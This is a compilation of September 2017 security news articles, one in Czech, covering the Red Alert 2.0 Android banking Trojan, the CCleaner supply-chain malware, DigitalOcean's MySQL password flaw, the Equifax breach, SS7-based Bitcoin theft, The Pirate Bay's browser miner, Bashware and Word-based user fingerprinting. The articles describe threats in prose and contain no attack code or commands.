Dubbed Red Alert 2.0, the malware has been designed and distributed over the past several months by a new threat actor, the researchers say. The threat features new code but its capabilities are similar to those of other Android banking Trojans, such as the use of overlays to steal login credentials, or the ability to intercept SMS messages and steal users’ contacts.

According to SfyLabs, the Red Alert actors have been adding new functionality to the threat to ensure it continues to be effective. The mobile malware can block and log incoming calls from banks, thus ensuring that financial firms can’t contact users of the infected Android phone to alert them regarding potential malicious activity.

The malware also uses Twitter to avoid losing bots when the command and control (C&C) server is taken offline. The researchers observed that, should the bot fail to connect to the hardcoded C&C, it would retrieve a new server from a Twitter account.

This approach isn’t new to the malware world, but has been associated mainly with Windows Trojans. In fact, SfyLabs claims that Red Alert 2.0 is the first Android banking Trojan they observed to pack such functionality. Given that more and more users perform banking operations directly from their mobile devices, it’s no surprise that miscreants switch focus to Android, the most popular mobile OS.

Should the C&C server be unavailable, a connection error is triggered. Code within the malware uses the current date combined with a salt stored in strings.xml to create a new MD5 hash. The first 16 characters of the hash are used as a Twitter handle registered by the Red Alert actors. The bot requests the Twitter page of the handle and parses the response to obtain the new C&C server address.

Unlike other Android banking Trojans that use overlays to steal login credentials, Red Alert 2.0 doesn’t receive the full list of targets from its C&C server. Keeping that list only on the server makes it more difficult to determine which banks the threat targets, but SfyLabs uncovered around 60 HTML overlays the actor is using at the moment.

Once the user launches a targeted application on an infected Android device, the malware displays an overlay page that mimics the legitimate one. However, when the user tries to log in, an error page is displayed, while the entered credentials are sent to the C&C server.

To know when to display the overlay and which fake page to show, the malware requests the topmost application periodically. On Android 5.0 and higher devices, the malware uses Android toolbox for this activity, an approach different from those used by Android Trojans such as Mazar, Exobot and BankBot, the security researchers explain.

The security researchers also discovered that the attackers can control the Trojan through commands sent directly from the C&C server. Commands include start/stop SMS interception, send SMS, set/reset default SMS, get SMS/call/contact list, set admin, launch app, send USSD, and block and notify.

Observed samples would masquerade as Flash Player updates, popular applications such as WhatsApp and Viber, Google Market update, and even Android system updates.


Ex-porn Actor German Spy Guilty of Trying to Share State Secrets
19.9.2017 securityweek Hacking
A former German intelligence agent who was also an ex-gay porn actor was Tuesday given a one-year suspended sentence for attempting to share state secrets while pretending to be a jihadist online.

The 52-year-old named as Roque M., made headlines when he was arrested last November in what initially appeared to be a case of an Islamist mole at work in Germany's domestic spy agency.

But he was freed in July after prosecutors dropped most of the charges, finding no evidence of an attack plot or ties to Islamist groups.

He told the court that he pretended to be a jihadist planning an attack in online chatrooms because he was bored.

"I never met with any Islamists. I would never do that. The whole thing was like a game," the suspect said at the start of his trial in the western city of Duesseldorf.

A former banker and a father-of-four, Roque M. told the court that he monitored the Islamist scene as part of his job for the Office for the Protection of the Constitution (BfV), a role he described as "a lot of fun".

But he said he grew bored on weekends when he was at home watching his disabled son, and immersed himself in the online world of Islamists, feigning to be one himself.

It was "an escape from reality," he said in court.

He even went so far as to arrange a meeting with a suspected Islamist at a gym, although Roque M. insisted he never had any intention of going.

He was caught after he offered to share classified information about BfV operations with someone who turned out to be a colleague working undercover.

The case initially sparked outrage, with Germany's domestic spy agency fending off calls for a complete security overhaul for allowing an "Islamist" to infiltrate its team who had passed multiple screenings.

The intelligence agent's colourful past as a gay porn actor also enthralled the public.

But as no evidence emerged of an actual Islamist plot, prosecutors left Roque M. facing the sole charge of attempting to share state secrets.


DigitalOcean Warns of Vulnerability Affecting Cloud Users
19.9.2017 securityweek Hacking
DigitalOcean is warning customers that some 1-Click applications running MySQL have an account with the same default password across all instances, and the company says the issue affects other cloud providers as well.

DigitalOcean customers reported on social media that they received an email recommending that they run a script to determine if their Droplets – the name used by the company for its cloud servers – are affected by the vulnerability.

The company allows its users to deploy pre-built and pre-configured applications with only one click. The list of 1-Click (One-Click) applications includes Node.js, Rails, Redis, MongoDB, Docker, GitLab, Magento and many others.

DigitalOcean discovered that 1-Click applications running MySQL on Debian and Ubuntu create a MySQL user named “debian-sys-maint” that has the same password on all Droplets created from a 1-Click image.

The “debian-sys-maint” user is designed for local administration purposes and it should have a random password. However, due to a bug, all instances of an application created from the same 1-Click image have the same password.

DigitalOcean said the vulnerability, which is “potentially remotely exploitable,” affects MySQL and several other applications that use MySQL, including PHPMyAdmin, LAMP, LEMP, WordPress and OwnCloud.

“We will be issuing a public notice regarding this issue, but first wanted to ensure our impacted users had time to take action,” the company said in its email to customers. “As part of our verification process, we have discovered that images on other cloud providers also have this mis-configuration.”

DigitalOcean has provided a script that allows users to determine if their Droplets are affected and updates their password if needed. The script works on Ubuntu 14, 16 and 17, and Debian 7 and 8; Debian 9 is not impacted.

Customers who have changed the password for the “debian-sys-maint” user after installation of a 1-Click app are not affected by the flaw and they don’t need to take any action.

“We have changed our 1-Clicks to ensure that all future Droplets will have unique, auto-generated passwords for this user,” DigitalOcean said.


CCleaner Server Was Compromised in Early July
19.9.2017 securityweek Hacking
A server distributing a version of PC utility CCleaner infected with malware might have been compromised in early July, Avast revealed.

Two versions of the highly popular Windows maintenance tool (32-bit CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191) were modified to distribute information stealing malware, and over 2 million users have been impacted by the incident. The infected binary was released on August 15 and remained undetected for four weeks.

CCleaner was developed by Piriform, which was acquired by anti-virus company Avast in July, 2017. After news of the infected installer broke on Monday, the security firm decided to step forward and clarify that the compromise likely happened before the July acquisition.

“Before we completed the acquisition, the bad actors were likely already in the process of hacking into the Piriform systems. The compromise may have started on July 3rd. The server was provisioned earlier in 2017 and the SSL certificate for the respective https communication had a timestamp of July 3, 2017,” an Avast blog post signed by Vince Steckler, CEO, and Ondrej Vlcek, CTO and EVP Consumer Business, reads.

The company also disclosed that they were warned of the infection by security company Morphisec, which says that it first encountered the malicious CCleaner installations on Aug. 20. However, it was only on Sept. 11 that Morphisec received logs from some of its customers and could start an investigation.

On Sept. 12, Morphisec warned Avast of the infection, and the latter was able to resolve the issue within 72 hours. By Sept. 15, the command and control server that the malware was contacting had been taken down and Piriform had already released a clean version of CCleaner.

Avast also claims that no actual harm was done to the impacted computers, despite the fact that 2.27 million users downloaded the infected application release, as the final payload in this attack never activated.

“About 30% of CCleaner users also run Avast security software, which enables us to analyze behavioral, traffic and file/registry data from those machines. Based on the analysis of this data, we believe that the second stage payload never activated, i.e. the only malicious code present on customer machines was the one embedded in the ccleaner.exe binary,” the company says.

CCleaner v5.34 and CCleaner Cloud v1.07.3214 have been released without the malicious code inside, and Avast says that only around 730,000 users are still running the affected version 5.33.6162 on their systems. The free CCleaner variant doesn’t include automatic updates, meaning that users need to manually download and install the clean version.

“We deeply understand the seriousness of the situation, as we do with all security threats. We regret the inconvenience experienced by Piriform’s customers. We plan to be issuing more updates on this as we go. We have made it our highest priority to properly investigate this unfortunate incident and to take all possible measures to ensure that it never happens again,” Avast also says.

Affected users are advised to update to the latest versions of CCleaner as soon as possible, to remove any malicious code from their computers.


New York Pushes to Regulate Credit Agencies After Equifax Breach
19.9.2017 securityweek CyberCrime
New York Governor Andrew Cuomo announced on Monday plans to make credit reporting firms comply with the 23 NYCRR 500 cybersecurity regulations enacted earlier this year. The move is in response to the massive Equifax breach disclosed on September 7, 2017.

"In response to the recent cyberattack that exposed the personal private data of nearly 150 million consumers nationwide, Governor Andrew M. Cuomo today directed the Department of Financial Services to issue new regulation making credit reporting agencies to register with New York for the first time and comply with this state's first-in-the-nation cybersecurity standard," says the statement.

"A person's credit history affects virtually every part of their lives and we will not sit idle by while New Yorkers remain unprotected from cyberattacks due to lax security," Governor Cuomo said. "Oversight of credit reporting agencies will help ensure that personal information is less vulnerable to cyberattacks and other nefarious acts in this rapidly changing digital world. The Equifax breach was a wakeup call and with this action New York is raising the bar for consumer protections that we hope will be replicated across the nation."

In the proposed new regulation (PDF), Maria T. Vullo, Superintendent of Financial Services, makes it clear that her department has been monitoring 'the deficient practices' of credit reporting companies (such as Equifax, Experian and TransUnion). She cites failure to safeguard consumer data; failure to maintain accurate data; and failure investigate alleged inaccuracies.

Her proposed solution is to require the credit companies to register with the DFS, to comply with certain prohibited practices, and to comply with the regulations introduced in DFS 500. Failure to comply with this new regulation (23 NYCRR 201) could lead to the revocation of the credit company's authorization to do business with New York's regulated financial institutions and consumers -- effectively making it impossible to carry on.

"The data breach at Equifax demonstrates the necessity of strong state regulation like New York's first-in-the-nation cybersecurity actions," said Financial Services Superintendent Maria T. Vullo. "This is one necessary action of several that DFS will take to protect New York's markets, consumers and sensitive information from criminals."

It is thought that 8 million New Yorkers may be affected by the Equifax breach.

'First-in-the-nation' is how New York describes the DFS 500 regulation. Its two key requirements are that regulated companies (covered entities) must employ a chief information security officer, and that they must deliver an annual cybersecurity report signed off by the board with a certification document to the DFS. The CISO "shall report in writing at least annually to the Covered Entity's board of directors or equivalent governing body." This will effectively be a statement on how the regulation is implemented, including details on 'material Cybersecurity Events'.

The process effectively makes the DFS the final arbiter on the adequacy of the regulated companies' cybersecurity policies; and the new proposal brings credit reporting agencies in line with the requirements for the regulated financial services organizations.

The proposed new regulation also introduces a new range of prohibitions on credit reporting agencies designed to protect consumers. These prohibit "any unfair, deceptive or predatory act or practice toward any consumer... violation of section 1036 of the Dodd-Frank Wall Street Reform and Consumer Protection Act..." and "Making any false statement or make any omission of a material fact in connection with any information or reports filed with a governmental agency or in connection with any investigation conducted by the superintendent or another governmental agency."

Cuomo makes it clear that he hopes that other states will follow with their own similar regulations on credit companies. This puts New York state in direct opposition to the perceived federal preferences of the Trump administration -- which would prefer to ease regulatory restrictions on business. Cuomo believes that tighter regulations are required to protect consumers, rather than looser regulations to promote business.

The new regulation will likely be subject to a public comment period. However, under the current proposal, credit reporting agencies will be required to register with the DFS by February 1, 2018, and annually thereafter. The DFS 500 cybersecurity regulation will need to be implemented on a staggered basis, but the credit companies will need to be in full compliance by October 4, 2019.


Researchers demonstrate how to steal Bitcoin by exploiting SS7 issues
19.9.2017 securityaffairs  Mobil

Hackers have exploited security weaknesses in SS7 protocol to break into a GMail account, take control of a bitcoin wallet and steal funds.
In June 2016, researchers with Positive Technologies demonstrated that it is possible to hack Facebook accounts by knowing phone numbers by exploiting a flaw in the SS7 protocol. The technique allows bypassing any security measure implemented by the giant of the social networks.

SS7 is a set of protocols used in telecommunications ever since the late 1970s, enabling smooth transportation of data without any breaches.

The security issue in the Signaling System 7 could be exploited by criminals, terrorists and intelligence agencies to spy on communications. The SS7 protocol allows cell phone carriers to collect location data related to the user’s device from cell phone towers and share it with other carriers, this means that exploiting the Signaling System 7 a carrier is able to discover the position of its customer everywhere he is.

The team of researchers from Positive Technologies is the same that demonstrated how to hack WhatsApp and Telegram accounts by leveraging on the SS7 protocol.

The attack method devised by the experts from Positive Technologies works against any service that relies on SMS to verify the user accounts, including Gmail and Twitter.

More than a year later, the situation is unchanged, flaws in Signaling System 7 protocol can be exploited to intercept one-time two-factor authentication tokens in SMSs.

If an attacker can reach the SS7 equipment it can hijack messages and calls. Suck kind of attacks could be carried on by compromising the SS7 equipment of a Telco company or by an insider, the attacker just needs the number of the target.

Back to the present, boffins at Positive Technologies obtained access to a telco’s Signaling System 7 platform, with permission for research purposes.

This time the researchers demonstrated that it is possible to control a victim’s Bitcoin wallet by exploiting SS7 issues.

SS7 hack cyber heist

The experts explained that just knowing the first name, last name, and phone number of the victims was enough to get their email address from Google’s find-a-person service and hack a wallet in Coinbase.

The experts first obtained the target Gmail address and cellphone number, then requested a password reset for the webmail account, which involved sending an authentication token to the cellphone number.

Positive exploited SS7 issues to intercept the authentication token and gain access to the victim’s Gmail account, then they reset the password to the user’s Coinbase wallet.

At this point, they accessed the Coinbase account and stolen the funds, a video PoC is available at the following URL:

Attacks exploiting SS7 vulnerabilities have already reported in the wild, earlier this year, cybercriminals targeted online bank accounts in Germany and stolen their funds. The company O2-Telefonica in Germany confirmed to Süddeutsche Zeitung agency that some of its customers suffered cyber heists exploiting the SS7 flaws.

“Exploiting SS7-specific features is one of several existing ways to intercept SMS,” said Dmitry Kurbatov, head of the telecommunications security department at Positive Technologies.

“Unfortunately, it is still impossible to opt out of using SMS for sending one-time passwords. It is the most universal and convenient two-factor authentication technology. All telecom operators should analyze vulnerabilities and systematically improve the subscriber security level.”

Experts highlighted that sensitive accounts using a phone for authentication are a risk of SS7 hijacks, it is more secure leverage on Two-Faction authentication using a mobile app (i.e. Google authenticator, or a key fob)


Was Torrent Site The Pirate Bay Being Sneaky or Creative By Tricking Visitors Into Monero Mining
19.9.2017 securityaffairs  Security

Users noticed a cryptocurrency miner surfaced on The Pirate Bay, the world’s largest torrenting for a day over the weekend.
Pop quiz: would you rather A) see ad banners displayed at the top of the website, or B) mine Monero cryptocurrency when you visit a website? Judging by the number of downloads for ad blocking browser extensions, no one likes banner ads. But if you ask The Pirate Bay this week, they will probably say the same thing about secretive Monero mining.

In August, security researchers at Netskope identified a malvertising campaign that downloaded the Zminer coin-miner and then used victims’ computers to mine Monero and Zcash cryptocurrencies for the benefit of the bad actors.

According to Threat Post, “Netskope provided details on two separate operations that have netted 101 Monero, or $8,300 USD, and 44 Zcash, or $10,100 USD so far. Zminer uses Monero on 32-bit Windows systems, and Zcash on 64-bit.”

The Pirate Bay

The challenge with most cryptocurrency mining is that the cost of operating the mining machines (e.g. electricity) eat away at much of the profit potential. But for the bad actors, victims pay the operating costs while the profits are reaped by the ones poisoning the banner ad system. When there are no costs, mining cryptocurrencies can be lucrative.

Last week a very observant Redditor Intertubes_Unclogger noticed that his CPU threads spiked to 80-85% visiting some pages on the very popular Torrent search site, The Pirate Bay (TPB). It is very unlikely that simple web browsing would cause such a spike so it was apparent something unexpected was going on. After some trial and error the Redditor determined that the ScriptSafe Chrome extension was preventing the process that caused the CPU spike. The Reddit community participating in solving the mystery guessed that TPB may have been unknowingly involved in a “shady bitcoin mining operation.” It turns out they were very close to the truth.

TPB was serving up shady Monero mining malware on some of its pages, but it wasn’t unexpected. From the official TPB blog,

“This is only a test. We really want to get rid of all the ads. But we also need enough money to keep the site running,” a site admin posted on The Pirate Bay’s blog, “Let us know what you think in the comments. Do you want ads or do you want to give away a few of your CPU cycles every time you visit the site?”

It turns out that TPB was experimenting with Coin Hive which is described as “a JavaScript miner for the Monero Blockchain that you can embed in your website. Your users run the miner directly in their Browser and mine XMR for you in turn for an ad-free experience, in-game currency or whatever incentives you can come up with.” Coin Hive themselves recommend that websites notify their users rather than sneakily stealing CPU cycles as TPB did. An admin at TPB suggested that there was a mistake made with the initial install as the miner was only expected to use 20-30% of the visitors’ CPU. This sounds a lot like “we didn’t think anyone would notice.”

At the end of the day, the general consensus in the /r/thepiratebay subreddit seems to be supportive of TPB’s attempts to fund their activities through means other than banner ads. And for users that would prefer to choose whether they are mining for someone else’s benefit, there are JavaScript and ad blocker extensions for the web browsers. This is evidence of one more reason why you need to control what is running in your browser.


Kyberzločinci jednoduše obejdou antiviry. V ohrožení je 400 miliónů počítačů

19.9.2017 Novinky/Bezpečnost Viry
Bezpečnostní experti ze společnosti Check Point odhalili nový způsob, jak mohou počítačoví piráti relativně snadno obejít zabezpečení počítačů s operačním systémem Windows 10. Tato metoda přitom nezneužívá žádnou bezpečnostní trhlinu, ale jednu z funkcí tohoto operačního systému.
„Technika nazvaná Bashware využívá novou funkci Windows 10 nazvanou "Subsystem for Linux" (WSL), která ještě nedávno byla jen v betaverzi, ale nyní už je plně podporovanou funkcí Windows,“ uvedl konstatoval Petr Kadrmas, bezpečnostní odborník ze společnosti Check Point.

Jde o oblíbený linuxový terminál (Bash), jenž je dostupný pro uživatele operačního systému Windows a umožňuje nativně spustit soubory z Linuxu v operačním systému Windows. Tento hybridní koncept tedy umožňuje současně kombinovat systémy Linux a Windows.

Stávající bezpečnostní řešení v desítkách však ale ještě stále nejsou přizpůsobena pro sledování procesů spustitelných linuxových souborů. „Kyberzločincům se tak otevírají nová dvířka, jak nepozorovaně spustit škodlivý kód a využít funkce WSL k maskovaní před bezpečnostními produkty, které ještě neimplementovaly odpovídající detekční mechanismy,“ zdůraznil Kadrmas.

Stovky miliónů ohrožených PC
„Check Point testoval tuto techniku na většině předních antivirových a bezpečnostních produktů a malware nebyl detekován. Bashware tak může potenciálně ovlivnit libovolný ze 400 miliónů počítačů, které v současné době pracují se systémem Windows 10,“ podotkl bezpečnostní expert.

Na hrozbu nemůže z logiky věci zareagovat samotný Microsoft, ale tvůrci jednotlivých antivirových řešení. Ta musí být schopna pracovat jak v prostředí Windows, tak Linuxu. V opačném případě jsou uživatelé vystaveni riziku.


Equifax Cybersecurity Failings Revealed Following Breach
19.9.2017 securityweek CyberCrime
Shortcomings revealed by researchers and cybersecurity firms following the massive data breach suffered by Equifax show that a successful hacker attack on the credit reporting agency’s systems was inevitable.

Some members of the industry pointed out last week that the company’s Chief Security Officer (CSO) Susan Mauldin was a music major with no educational background in cybersecurity or technology. Mauldin and Chief Information Officer David Webb retired from the company on Friday.

Others dug up old vulnerability reports that the firm had still not addressed and noted the lack of even basic protections on the company’s website. Even the website set up by Equifax to provide information about the breach was riddled with security holes and some services flagged it as a phishing site.

The organization does not have a vulnerability disclosure program that would allow and encourage security experts to responsibly report the flaws they find.

The Apache Struts 2 vulnerability leveraged by cybercriminals to breach Equifax systems had been known and exploited for roughly two months before the attack on the company. Equifax said its security team knew about the flaw and is now trying to determine why an online dispute portal, which served as the initial point of entry, remained unpatched.

Experts pointed out that the Apache Struts flaw is not easy to fix, especially if you have many systems that need patching. However, they believe the problem can be addressed with modern security solutions.

Comodo discovered that more than 388 records of Equifax users and employees are up for sale on the dark web. The information, which includes usernames, passwords and login URLs, was apparently stolen using Pony malware. The security firm pointed out that some Equifax credentials were also exposed in third-party incidents, including the massive LinkedIn and Dropbox breaches.

“From third-party (non-company system) sources, we uncovered that Equifax’s chief privacy officer, CIO, VP of PR and VP of Sales, used all lowercase letters, no special symbols, and easily guessable words like spouses’ names, city names, and even combinations of initials and birth year. This reveals that they didn’t follow basic security best practices and were lacking a complex password requirement,” Comodo said in a blog post.

Another security incident related to the company was brought to light by security blogger Brian Krebs, who was informed by researchers that an Equifax Argentina employee portal exposed 14,000 records, including credentials and consumer complaints.

The breach, the manner in which the company investigated the incident, and some of these security failings have led to a significant drop in Equifax shares. Before the hack was disclosed, Equifax stock was worth roughly $140, but it has now dropped to $92, and financial experts believe it could plunge as low as $50. The incident has already cost the company nearly $10 billion in market value.


New Attack Fingerprints Users Using Word Documents
19.9.2017 securityweek Attack
A newly detailed attack method leverages Microsoft Word documents to gather information on users, but doesn’t use macros, exploits or any other active content to do so, security researchers at Kaspersky Lab have discovered.

Distributed as attachments to phishing emails, these documents were in OLE2 format and contained links to PHP scripts located on third-party web resources. As soon as a user opens the files in Microsoft Office, the application accesses one of the links, resulting in the attackers receiving information about the software installed on the computer.

An analyzed document contained tips on how one could use Google search more effectively and doesn’t appear to be suspicious, especially since it doesn’t contain active content, embedded Flash objects or PE files. However, as soon as a user opens the document, Word sends a GET request to an internal link.

“This code effectively sent information about the software installed on the victim machine to the attackers, including info about which version of Microsoft Office was installed,” the security researchers say.

The security researchers discovered that the document used an undocumented Word feature, where an INCLUDEPICTURE field is used. This field indicates that an image is attached to certain characters in the text, but attackers used it to include a suspicious link there, although not the URL addressed by Word.

While the text in the Word document is stored in a raw state, so-called fields are used to indicate in which way portions of the text should be presented. A specific byte indicates that the raw text ends and the field INCLUDEPICTURE begins, and separator, and end bytes are also associated with the field.

In the analyzed document, a byte between the separator and the end indicates that an image should be inserted at that point. After locating the byte sequence with the picture placeholder, the researchers concluded at which offset the image should be located in the Data stream. The offset turned out to be a Form, and its name was another suspicious link.

Because the link was only an object name, it wasn’t used in any way, but a combination of flags was used to indicate that additional data should be attached to the form. This data, the researchers say, “constitutes a URL that leads to the actual content of the form.”

A a ‘do not save’ flag prevented the content from being saved to the actual document when it is opened.

The issue, the Kaspersky researchers say, is that “Microsoft Office documentation provides basically no description of the INCLUDEPICTURE field.” They couldn’t find information on what the data that follows the separator may mean, and how it should be interpreted, which was the main problem when trying to understand how the document was following the URL.

“This is a complex mechanism that the bad guys have created to carry out profiling of potential victims for targeted attacks. In other words, they perform serious in-depth investigations in order to stay undetected while they carry out targeted attacks,” Kaspersky says.

This Office feature exists in Word and Windows, Microsoft Office for iOS, and Microsoft Office for Android, the researchers discovered. However, LibreOffice and OpenOffice do not have it, meaning that Word documents opened with any of these applications won’t call the malicious link.


Hackers exploit an undocumented Word feature for user fingerprinting
19.9.2017 securityaffairs Exploit

Kaspersky researchers discovered a new attack technique leveraging an undocumented Word feature to gather information on users.
Kaspersky researchers discovered a new attack technique leveraging Microsoft Word documents to gather information on users. The technique is innovative because it doesn’t use active content such as macros or exploits, it exploits an undocumented Word feature to fingerprint users.

The attackers sent phishing emails using Word documents in OLE2 format and contained links to PHP scripts hosted on third-party web resources. Once the user opened the files in Microsoft Office, the application accesses one of the links, resulting in the attackers receiving information about the software installed on the target machine.

“They were in OLE2 format and contained no macros, exploits or any other active content. However, a close inspection revealed that they contained several links to PHP scripts located on third-party web resources.” reads the analysis published by Kaspersky Lab. “When we attempted to open these files in Microsoft Word, we found that the application addressed one of the links. As a result, the attackers received information about the software installed on the computer.”

One of the documents analyzed by the researchers contained tips on how to use Google search more effectively, it doesn’t contain active content, no VBA macros, embedded Flash objects or PE files. Once opened Word sends a GET request to an internal link.

“This code effectively sent information about the software installed on the victim machine to the attackers, including info about which version of Microsoft Office was installed,” continues the analysis.

The researchers discovered that the document used an undocumented Word feature, they noticed the presence of an INCLUDEPICTURE field that indicates that an image is attached to certain characters in the text.

The experts highlighted that there is no description for Microsoft Office documentation provides basically no description of the INCLUDEPICTURE field.

The attackers used the INCLUDEPICTURE field to include a suspicious link there, although not the URL addressed by Word.

The text in Word documents is stored in the WordDocument stream in a ‘raw state that doesn’t contain formatting except for so-called fields. The fields are used to instruct Word that a certain segment of the text must be presented in a specific way. The field INCLUDEPICTURE indicates that an image is attached to certain characters in the text.

The experts identified the following characters inside the document:

Begin = 0x13
Sep = 0x14
End = 0x15
Field = <Begin> *<Field> [Sep] *<Field> <End>

undocumented word feature

A byte between the separator (SEP) and the end (END) tells words that an image should be inserted at that point. The experts first located the byte sequence with the picture placeholder, then they discovered at which offset the image should be located in the Data stream.

“So, we go to offset 0 in the Data stream and see that the so-called SHAPEFILE form is located there:

undocumented Word feature fingerprint

Forms are described in a different Microsoft document: [MS-ODRAW]: Office Drawing Binary File Format. This form has a name and, in this case, it is another suspicious link:” continues the analysis.

Experts noticed that a combination of flags was used to indicate that additional data should be attached to the form. According to Kaspersky, this data constitutes a URL that leads to the actual content of the form.

“This indicates that additional data should be attached to the form (it is highlighted in yellow in the screenshot), and that this data constitutes a URL that leads to the actual content of the form. Also, there is a ‘do not save’ flag, which prevents this content from being saved to the actual document when it is opened.” continues the analysis.

The attackers devised this complex technique to fingerprint users opening the Word documents.

“This is a complex mechanism that the bad guys have created to carry out profiling of potential victims for targeted attacks. In other words, they perform serious in-depth investigations in order to stay undetected while they carry out targeted attacks,” Kaspersky says.

According to Kaspersky, the Office feature exists in Word and Windows, Microsoft Office for iOS, and Microsoft Office for Android. LibreOffice and OpenOffice do not implement this feature


CCleaner supply chain compromised to distribute malware
19.9.2017 securityaffairs Virus

CCleaner app version 5.33 that was available for download between August 15 and September 12 was modified to include the Floxif malware
Bad news for the users of the CCleaner app, according to researchers with Cisco Talos, version 5.33 that was available for download between August 15 and September 12 was modified to include the Floxif malware.

The Floxif malware downloader is used to gathers information (computer name, a list of installed applications, a list of running processes, MAC addresses for the first three network interfaces) about infected systems and to download and run other malicious binaries.

The variant of Floxif malware spread by the crooks only works on 32-bit systems and victims must use an administrator account.

“For a period of time, the legitimate signed version of CCleaner 5.33 being distributed by Avast also contained a multi-stage malware payload that rode on top of the installation of CCleaner.” reads the analysis published by Cisco Talos. “CCleaner boasted over 2 billion total downloads by November of 2016 with a growth rate of 5 million additional users per week. Given the potential damage that could be caused by a network of infected computers even a tiny fraction of this size we decided to move quickly” states the analysis published by Cisco Talos.

Cisco Talos experts spotted the trojanized CCleaner app last week while performing beta testing of a new exploit detection solution, they noticed that a version of CCleaner 5.33 was connecting to suspicious domains. later discovered that the CCleaner installer was downloaded from the official website and was signed using a valid digital certificate.

Further investigation allowed Talos to discover that the tainted CCleaner version was deployed on the official website and was signed using a valid digital certificate.

Researchers speculate attackers have compromised the Avast’s supply chain to spread the Floxif trojan.

It is possible that attackers compromised the company system, but experts haven’t excluded that the incident was an insider’s job.

“Given the presence of this compilation artifact as well as the fact that the binary was digitally signed using a valid certificate issued to the software developer, it is likely that an external attacker compromised a portion of their development or build environment and leveraged that access to insert malware into the CCleaner build that was released and hosted by the organization. It is also possible that an insider with access to either the development or build environments within the organization intentionally included the malicious code or could have had an account (or similar) compromised which allowed an attacker to include the code.” continues Talos.

Let’s remind that Avast owns Piriform that developed the CCleaner solution, the Antivirus solution firm bought it in July, a month before the tainted CCleaner 5.33 version was released.

On September 13, Piriform released a new version of the CCleaner (5.34) and CCleaner Cloud version 1.07.3191 that do not contain the malware.

“Based on further analysis, we found that the 5.33.6162 version of CCleaner and the 1.07.3191 version of CCleaner Cloud was illegally modified before it was released to the public, and we started an investigation process. We also immediately contacted law enforcement units and worked with them on resolving the issue.” reads a blog post published by Piriform.

The Floxif trojan leverage the DGA algorithm to randomly generated domains names used as command and control (C&C) servers. The DNS data revealed that DNS requests for the domain names used in August and September show thousands of users were infected.

CCleaner DNS requests August-September

Once informed of the incident Avast took down the C&C servers and observed a spike in the number of infected hosts making DNS queries for a backup domain.


It is important to highlight that updating to version 5.34 does not solve the situation because the malware will be still present on infected hosts.


Warning: CCleaner Hacked to Distribute Malware; Over 2.3 Million Users Infected
18.9.2017 thehackernews Virus

If you have downloaded or updated CCleaner application on your computer between August 15 and September 12 of this year from its official website, then pay attention—your computer has been compromised.
CCleaner is a popular application with over 2 billion downloads, created by Piriform and recently acquired by Avast, that allows users to clean up their system to optimize and enhance performance.
Security researchers from Cisco Talos discovered that the download servers used by Avast to let users download the application were compromised by some unknown hackers, who replaced the original version of the software with the malicious one and distributed it to millions of users for around a month.
This incident is yet another example of supply chain attack. Earlier this year, update servers of a Ukrainian company called MeDoc were also compromised in the same way to distribute the Petya ransomware, which wreaked havoc worldwide.
Avast and Piriform have both confirmed that the Windows 32-bit version of CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 were affected by the malware.
Detected on 13 September, the malicious version of CCleaner contains a multi-stage malware payload that steals data from infected computers and sends it to attacker's remote command-and-control servers.

Moreover, the unknown hackers signed the malicious installation executable (v5.33) using a valid digital signature issued to Piriform by Symantec and used Domain Generation Algorithm (DGA), so that if attackers' server went down, the DGA could generate new domains to receive and send stolen information.
"All of the collected information was encrypted and encoded by base64 with a custom alphabet," says Paul Yung, V.P. of Products at Piriform. "The encoded information was subsequently submitted to an external IP address 216.126.x.x (this address was hardcoded in the payload, and we have intentionally masked its last two octets here) via a HTTPS POST request."
The malicious software was programmed to collect a large number of user data, including:
Computer name
List of installed software, including Windows updates
List of all running processes
IP and MAC addresses
Additional information like whether the process is running with admin privileges and whether it is a 64-bit system.
How to Remove Malware From Your PC
According to the Talos researchers, around 5 million people download CCleaner (or Crap Cleaner) each week, which indicates that more than 20 Million people could have been infected with the malicious version the app.
"The impact of this attack could be severe given the extremely high number of systems possibly affected. CCleaner claims to have over 2 billion downloads worldwide as of November 2016 and is reportedly adding new users at a rate of 5 million a week," Talos said.
However, Piriform estimated that up to 3 percent of its users (up to 2.27 million people) were affected by the malicious installation.
Affected users are strongly recommended to update their CCleaner software to version 5.34 or higher, in order to protect their computers from being compromised. The latest version is available for download here.


Windows 10 Users to Get Improved Privacy Controls
18.9.2017 securityweek  Privacy
The upcoming Windows 10 Fall Creators Update will bring enhanced privacy controls to both consumers and commercial customers, Microsoft says.

After being heavily criticized for the large amount of user data collected from Windows 10 machines, Microsoft has decided to implement a series of data protections to silence concerns, and has been successful in its attempt.

Released earlier this year, the Windows 10 Creators Update provided users with increased control over privacy settings and updates, and also allowed them to choose how much usage data they like to share with Microsoft. In July, the company announced that it would force users into reviewing their privacy settings and installing the latest feature update, namely Windows 10 Creators Update.

In addition, Microsoft also improved transparency on the diagnostic data collected from Windows 10 machines. Now, the company is looking into providing users with increased access to information and more control over the collected information, Marisa Rogers, Windows and Devices Group Privacy Officer, reveals.

Consumers will enjoy simplified access to information about features and the data collection around those features, courtesy of two privacy changes made to the setup process.

Starting with Windows 10 Fall Creators Update, set to arrive on October 17, users have direct access to the Privacy Statement within the setup process and can also use the Learn More page on the privacy settings screen to jump to specific settings for location, speech recognition, diagnostics, tailored experiences, and ads while choosing their privacy settings.

“You no longer need to sift through the privacy statement if you only want to read about a specific feature, simply click the Learn More button for easy access,” Rogers explained in a blog post.

Moreover, users will also have increased transparency and control over which applications can access their information. Similar to permission prompts for the use of location data when launching a map or other location-aware applications, permission requests will pop up when applications installed through the Windows Store will need access to various device capabilities.

“You will be prompted to provide permission before an app can access key device capabilities or information such as your camera, microphone, contacts, and calendar, among others. This way you can choose which apps can access information from specific features on your device,” Rogers explains.

The app permission prompts will only appear for apps installed after the Fall Creators Update. However, users will be able to review and manage existing app permissions by selecting Start > Settings > Privacy.

In addition to these changes, enterprise customers will also have access to a new setting that limits diagnostic data to the minimum required for Windows Analytics, a service that allows admins to decrease IT costs by gaining insights – through Windows Diagnostics – into the computers running Windows 10 in their organizations.


Connected Medicine and Its Diagnosis
18.9.2017 Kaspersky  Safety

Medical data is slowly but surely migrating from paper mediums to the digital infrastructure of medical institutions. Today, the data is “scattered” across databases, portals, medical equipment, etc. In some cases, the security of the network infrastructure of such organizations is neglected, and resources that process medical information are accessible from outside sources.

